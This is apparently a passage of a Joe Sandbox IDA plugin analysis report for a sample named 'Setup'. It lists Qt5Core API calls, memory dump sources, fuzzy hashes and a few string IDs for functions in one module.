                                                                                                                                                              • Instruction Fuzzy Hash: 6E71A676A0AA0686EFA28F21E4502BD7361FB80BA4F494037CE6E47754EF3CE445CB40
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$??8@Array@@ByteNull@String@@0@$Object@@$?activate@Meta
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 168968883-0
                                                                                                                                                              • Opcode ID: 760bc68ac67a2b3903593b30f861ae92857236a924f29b4bb27677fa3ea1fdab
                                                                                                                                                              • Instruction ID: d30671465be6e38e53331d1f5df81fb1ff60cbe5f848dc04aa45f88be426cdc7
                                                                                                                                                              • Opcode Fuzzy Hash: 760bc68ac67a2b3903593b30f861ae92857236a924f29b4bb27677fa3ea1fdab
                                                                                                                                                              • Instruction Fuzzy Hash: F141526261DA8191EB91DF21E8446B96761FF84BD8F845032EE8F07A65DF3CD54ACF00
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,?,00007FFBA1973171), ref: 00007FFBA1978B0F
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA1978B43
                                                                                                                                                              • ?hasRegisteredConverterFunction@QMetaType@@SA_NHH@Z.QT5CORE ref: 00007FFBA1978B5F
                                                                                                                                                              • ?registerConverterFunction@QMetaType@@SA_NPEBUAbstractConverterFunction@QtPrivate@@HH@Z.QT5CORE ref: 00007FFBA1978B7F
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1978B8F
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA1978BDE
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA1978C0B
                                                                                                                                                                • Part of subcall function 00007FFBA1A56300: EnterCriticalSection.KERNEL32(?,?,?,00007FFBA1A1EA32,?,?,?,00007FFBA1A36395), ref: 00007FFBA1A56310
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@ByteConverterFunction@Type@@$?registerInit_thread_footerType@$?has?normalizedAbstractCriticalEnterFlag@Flags@NormalizedObject@@Object@@@Private@@RegisteredSectionTypeType@@@@
                                                                                                                                                              • String ID: QList<QSslError>
                                                                                                                                                              • API String ID: 1000455719-3567200712
                                                                                                                                                              • Opcode ID: 101f4a1aa42a21c2234f67f78181bb3c423d321e7a6bbd3f69bbc0f22aabf0f3
                                                                                                                                                              • Instruction ID: 57682ba8f47f4788afb7b21bba3ca120577e162ef837528b4c6f21b1924986c3
                                                                                                                                                              • Opcode Fuzzy Hash: 101f4a1aa42a21c2234f67f78181bb3c423d321e7a6bbd3f69bbc0f22aabf0f3
                                                                                                                                                              • Instruction Fuzzy Hash: D23107B5A0EA42C6EB929B34E8401757361FF44768F804136DD6D836A6EF7CE90ACF44
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QMutex@@QEAA@XZ.QT5CORE ref: 00007FFBA1975DFE
                                                                                                                                                              • ?setHost@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z.QT5CORE ref: 00007FFBA1975E12
                                                                                                                                                              • ?setPort@QUrl@@QEAAXH@Z.QT5CORE ref: 00007FFBA1975E1F
                                                                                                                                                              • ??0QString@@QEAA@VQLatin1String@@@Z.QT5CORE ref: 00007FFBA1975E4E
                                                                                                                                                              • ?setScheme@QUrl@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FFBA1975E5E
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1975E69
                                                                                                                                                                • Part of subcall function 00007FFBA1984060: ??4QUrl@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA1984084
                                                                                                                                                                • Part of subcall function 00007FFBA1978050: ?getAndRef@ExternalRefCountData@QtSharedPointer@@SAPEAU12@PEBVQObject@@@Z.QT5CORE ref: 00007FFBA1978074
                                                                                                                                                                • Part of subcall function 00007FFBA1978050: ?connectImpl@QObject@@CA?AVConnection@QMetaObject@@PEBV1@PEAPEAX01PEAVQSlotObjectBase@QtPrivate@@W4ConnectionType@Qt@@PEBHPEBU3@@Z.QT5CORE ref: 00007FFBA197811F
                                                                                                                                                                • Part of subcall function 00007FFBA1978050: ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA197812D
                                                                                                                                                                • Part of subcall function 00007FFBA1978050: ?connectImpl@QObject@@CA?AVConnection@QMetaObject@@PEBV1@PEAPEAX01PEAVQSlotObjectBase@QtPrivate@@W4ConnectionType@Qt@@PEBHPEBU3@@Z.QT5CORE ref: 00007FFBA197819F
                                                                                                                                                                • Part of subcall function 00007FFBA1978050: ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19781AD
                                                                                                                                                                • Part of subcall function 00007FFBA1978050: ?connect@QObject@@QEBA?AVConnection@QMetaObject@@PEBV1@PEBD1W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19781D6
                                                                                                                                                                • Part of subcall function 00007FFBA1978050: ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19781E1
                                                                                                                                                                • Part of subcall function 00007FFBA1978050: ?connect@QObject@@QEBA?AVConnection@QMetaObject@@PEBV1@PEBD1W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA197820A
                                                                                                                                                                • Part of subcall function 00007FFBA1978050: ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA1978215
                                                                                                                                                              • ??1QUrl@@QEAA@XZ.QT5CORE ref: 00007FFBA1975EB1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object@@$Connection@Meta$Url@@$ConnectionType@$?setString@@$?connect?connect@Base@Impl@ObjectPrivate@@Qt@@Qt@@@SlotString@@@U3@@$?getCountData@ExternalHost@Latin1Mode@1@@Mutex@@Object@@@ParsingPointer@@Port@Ref@Scheme@SharedU12@V0@@
                                                                                                                                                              • String ID: preconnect-http
                                                                                                                                                              • API String ID: 3434442411-867629942
                                                                                                                                                              • Opcode ID: b5331ccc19341ecf2f7ae1ec346a91190f474b45fca11f446cc8a1f9e3a7ae3a
                                                                                                                                                              • Instruction ID: af7808c5c7d139fd542fda0f50127c17d5c664ec0655cc2d83b294c4acfad437
                                                                                                                                                              • Opcode Fuzzy Hash: b5331ccc19341ecf2f7ae1ec346a91190f474b45fca11f446cc8a1f9e3a7ae3a
                                                                                                                                                              • Instruction Fuzzy Hash: 80213DB261DA8682DB51DB25F4800AAA361FBC47A4F404032EE9E47A68EF7CD149CF40
                                                                                                                                                              APIs
                                                                                                                                                              • ?quit@QThread@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1973701), ref: 00007FFBA197768B
                                                                                                                                                              • ??0QDeadlineTimer@@QEAA@_JW4TimerType@Qt@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1973701), ref: 00007FFBA19776A5
                                                                                                                                                              • ?wait@QThread@@QEAA_NVQDeadlineTimer@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1973701), ref: 00007FFBA19776BB
                                                                                                                                                              • ?isFinished@QThread@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1973701), ref: 00007FFBA19776C5
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1973701), ref: 00007FFBA1977714
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1973701), ref: 00007FFBA197771F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object@@Thread@@$Connection@DeadlineMetaQt@@@Type@$?connect@?quit@?wait@ConnectionFinished@TimerTimer@@Timer@@@
                                                                                                                                                              • String ID: 1deleteLater()$2finished()
                                                                                                                                                              • API String ID: 2934167592-3963875448
                                                                                                                                                              • Opcode ID: b7c784f0690a79757fd1bf540912b184c017b88d2b98ae5e06ca652e59216dc9
                                                                                                                                                              • Instruction ID: 4c676df70af233f14d666f90b3c0f65fce49b709f5878823172a1b422210f48e
                                                                                                                                                              • Opcode Fuzzy Hash: b7c784f0690a79757fd1bf540912b184c017b88d2b98ae5e06ca652e59216dc9
                                                                                                                                                              • Instruction Fuzzy Hash: A1113B72A09B4282EB468F25E5540A97361FB88B98F844132DE9D07624DF3CE596CB00
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@String@@@$?beginGroup@Latin1Settings@@
                                                                                                                                                              • String ID: Policies$StrictTransportSecurity
                                                                                                                                                              • API String ID: 2199165388-150398989
                                                                                                                                                              • Opcode ID: 049dec6478e2245b03af30e8858d7da79c7373dd77a5cf3d425b5c050def02da
                                                                                                                                                              • Instruction ID: af31f32c86213d3908034bdcf64b6f9fe84bfdd7d0de4237c01a648269ea7528
                                                                                                                                                              • Opcode Fuzzy Hash: 049dec6478e2245b03af30e8858d7da79c7373dd77a5cf3d425b5c050def02da
                                                                                                                                                              • Instruction Fuzzy Hash: CF11F1A250DB8696DB228F24E4400AAB371FB99718F545232DFDD06528EF3CD689CF00
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$?dispose@Data@1@@Data@@List$?const?convert@?userData@Int@Type@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1108074453-0
                                                                                                                                                              • Opcode ID: b5b6ab2caf4c0600de8dae5f70e2c52984aa91c0f30ec555ccca8f257d7ff96c
                                                                                                                                                              • Instruction ID: c19422fc211d2df08a75213df675a90752c55c00e0a9c8d14a60585de723828f
                                                                                                                                                              • Opcode Fuzzy Hash: b5b6ab2caf4c0600de8dae5f70e2c52984aa91c0f30ec555ccca8f257d7ff96c
                                                                                                                                                              • Instruction Fuzzy Hash: E181A676B0AA4686EB928F35D4502BD6361FB84B98F9D4136DE4E07764DE3CD446CF00
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A43750: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1A43864
                                                                                                                                                                • Part of subcall function 00007FFBA1A43750: ??1QMutexLocker@@QEAA@XZ.QT5CORE ref: 00007FFBA1A43880
                                                                                                                                                              • ?lock@QMutex@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA1A29E78
                                                                                                                                                              • ?createData@QMapDataBase@@SAPEAU1@XZ.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA1A29F52
                                                                                                                                                                • Part of subcall function 00007FFBA1A224A0: ?createNode@QMapDataBase@@QEAAPEAUQMapNodeBase@@HHPEAU2@_N@Z.QT5CORE ref: 00007FFBA1A224C8
                                                                                                                                                                • Part of subcall function 00007FFBA1A224A0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1A224D9
                                                                                                                                                                • Part of subcall function 00007FFBA1A224A0: ??0QVariant@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1A224E7
                                                                                                                                                                • Part of subcall function 00007FFBA1A224A0: ?color@QMapNodeBase@@QEBA?AW4Color@1@XZ.QT5CORE ref: 00007FFBA1A224F0
                                                                                                                                                                • Part of subcall function 00007FFBA1A224A0: ?setColor@QMapNodeBase@@QEAAXW4Color@1@@Z.QT5CORE ref: 00007FFBA1A224FB
                                                                                                                                                                • Part of subcall function 00007FFBA1A224A0: ?setParent@QMapNodeBase@@QEAAXPEAU1@@Z.QT5CORE ref: 00007FFBA1A2251C
                                                                                                                                                                • Part of subcall function 00007FFBA1A224A0: ?setParent@QMapNodeBase@@QEAAXPEAU1@@Z.QT5CORE ref: 00007FFBA1A22547
                                                                                                                                                              • ?setParent@QMapNodeBase@@QEAAXPEAU1@@Z.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA1A29F7B
                                                                                                                                                              • ?recalcMostLeftNode@QMapDataBase@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA1A29F84
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA1A29FCC
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA1A29FD6
                                                                                                                                                              • ?freeTree@QMapDataBase@@QEAAXPEAUQMapNodeBase@@H@Z.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA1A2A005
                                                                                                                                                              • ?freeData@QMapDataBase@@SAXPEAU1@@Z.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA1A2A00E
                                                                                                                                                              • ??1QMutexLocker@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA1A2A03D
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Base@@$Node$Data$?setU1@@$Parent@$?create?freeArray@@ByteData@Locker@@MutexNode@V0@@Variant@@$?color@?dispose@?lock@?recalcColor@Color@1@Color@1@@Data@1@@Data@@LeftListMostMutex@@Tree@U2@_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3892431818-0
                                                                                                                                                              • Opcode ID: bcd97469e92dda87db8fa481338221eac320456941b9ed2bfef641007a5593b0
                                                                                                                                                              • Instruction ID: 566e616ab425d4f0c55ae8835acd1f1f0125166e96fd1a747bca66545cf2649d
                                                                                                                                                              • Opcode Fuzzy Hash: bcd97469e92dda87db8fa481338221eac320456941b9ed2bfef641007a5593b0
                                                                                                                                                              • Instruction Fuzzy Hash: 78516CB2A0AB4297DB96DF35E4901AD7360FB44B50B444136DFAE43AA5EF3CE465CB00
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?append@?detach_grow@?dispose@?end@Data@1@Data@1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2334897397-0
                                                                                                                                                              • Opcode ID: b3f1beced083453213ad4c9c9faf8b41feb88cac5b5f0666324e5440fe3e7a6c
                                                                                                                                                              • Instruction ID: a3f61aff7f488172e8bd66e53b4cb0285ad535bf24b87288876a52425de19c8e
                                                                                                                                                              • Opcode Fuzzy Hash: b3f1beced083453213ad4c9c9faf8b41feb88cac5b5f0666324e5440fe3e7a6c
                                                                                                                                                              • Instruction Fuzzy Hash: ED41B2B670AB4286DF629F66E4501697361FF84BA5F498131CEAD07754DF3CD44ACB00
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?append@?detach_grow@?dispose@?end@Data@1@Data@1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2334897397-0
                                                                                                                                                              • Opcode ID: 9fcf0476a9c44d1f9dfc33a72541c66f0dd35ed7202e54ca7b647fe2655306ce
                                                                                                                                                              • Instruction ID: 09e11b9701a35cff2bfcbbea2bf0909c328c673f40005e853ffc2dae4b9d3c08
                                                                                                                                                              • Opcode Fuzzy Hash: 9fcf0476a9c44d1f9dfc33a72541c66f0dd35ed7202e54ca7b647fe2655306ce
                                                                                                                                                              • Instruction Fuzzy Hash: 0741BDB6B0AB0282DF629F65E444169B3A1FF84FA5B498132DE6D07764EF3CD446CB00
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?append@?detach_grow@?dispose@?end@Data@1@Data@1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2334897397-0
                                                                                                                                                              • Opcode ID: d3e17751339ceffbc2f5885f15fa430a1d23a0409c4a5ff071a31ba0b95d821a
                                                                                                                                                              • Instruction ID: 38a1ac08db7c7f6546596ddbc323c2762c121f73cf93ebac8bd6d0f05820b89a
                                                                                                                                                              • Opcode Fuzzy Hash: d3e17751339ceffbc2f5885f15fa430a1d23a0409c4a5ff071a31ba0b95d821a
                                                                                                                                                              • Instruction Fuzzy Hash: 21418472B49B4282DFA19F21E4501B9A361FF85BA1F484132DEAD57B64EF7CE445CB00
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?append@?detach_grow@?dispose@?end@Data@1@Data@1@@
                                                                                                                                                              APIs
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,00007FFBA1972112,?,?,07F00000,00007FFBA1972641,?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972C62
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,00007FFBA1972112,?,?,07F00000,00007FFBA1972641,?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972C77
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,00007FFBA1972112,?,?,07F00000,00007FFBA1972641,?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972C86
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,00007FFBA1972112,?,?,07F00000,00007FFBA1972641,?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972C9B
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA1972112,?,?,07F00000,00007FFBA1972641,?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972CC2
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA1972112,?,?,07F00000,00007FFBA1972641,?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972CD0
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA1972112,?,?,07F00000,00007FFBA1972641,?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972CDE
                                                                                                                                                              • memmove.VCRUNTIME140(?,?,?,00007FFBA1972112,?,?,07F00000,00007FFBA1972641,?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972D1B
                                                                                                                                                              • ?deallocate@QArrayData@@SAXPEAU1@_K1@Z.QT5CORE(?,?,?,00007FFBA1972112,?,?,07F00000,00007FFBA1972641,?,?,00000000,00000000,00007FFBA1971B2D), ref: 00007FFBA1972D64
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array$Data@@$?data@Array@@ByteV0@@$U1@_$?allocate@?deallocate@AllocationData@@@@@Flags@Option@memmove
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?append@?detach_grow@?dispose@?end@Data@1@Data@1@@
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?append@?detach_grow@?dispose@?end@Array@@ByteData@1@Data@1@@String@@
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@ListV0@@$Array@@Byte$?begin@DateTime@@$?detach@?dispose@?end@BasicData@1@Data@1@@Timer@@Url@@
                                                                                                                                                              APIs
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,00000000,00007FFBA19EDB1F), ref: 00007FFBA19EDCF1
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,00000000,00007FFBA19EDB1F), ref: 00007FFBA19EDD26
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,00000000,00007FFBA19EDB1F), ref: 00007FFBA19EDD3B
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,00000000,00007FFBA19EDB1F), ref: 00007FFBA19EDD4A
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,00000000,00007FFBA19EDB1F), ref: 00007FFBA19EDD5E
                                                                                                                                                              • memmove.VCRUNTIME140(?,?,00000000,00007FFBA19EDB1F), ref: 00007FFBA19EDD74
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,00000000,00007FFBA19EDB1F), ref: 00007FFBA19EDDB8
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,00000000,00007FFBA19EDB1F), ref: 00007FFBA19EDDC1
                                                                                                                                                              • ?deallocate@QArrayData@@SAXPEAU1@_K1@Z.QT5CORE(?,?,00000000,00007FFBA19EDB1F), ref: 00007FFBA19EDDD4
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array$Data@@$?data@$U1@_$?allocate@AllocationData@@@@@Flags@Option@$?deallocate@memmove
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA19802FE
                                                                                                                                                              • ??0QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA1980308
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA1980312
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA198031C
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA1980326
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA1980330
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA198033A
                                                                                                                                                                • Part of subcall function 00007FFBA1978DC0: ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,00000000,00007FFBA1980357), ref: 00007FFBA1978E03
                                                                                                                                                                • Part of subcall function 00007FFBA1978DC0: ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA1978E37
                                                                                                                                                                • Part of subcall function 00007FFBA1978DC0: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1978E44
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ?typeName@QMetaType@@SAPEBDH@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA197981E
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA1979845
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ?reserve@QByteArray@@QEAAXH@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA1979853
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ?append@QByteArray@@QEAAAEAV1@PEBDH@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA197986B
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA1979876
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ?append@QByteArray@@QEAAAEAV1@PEBDH@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA1979885
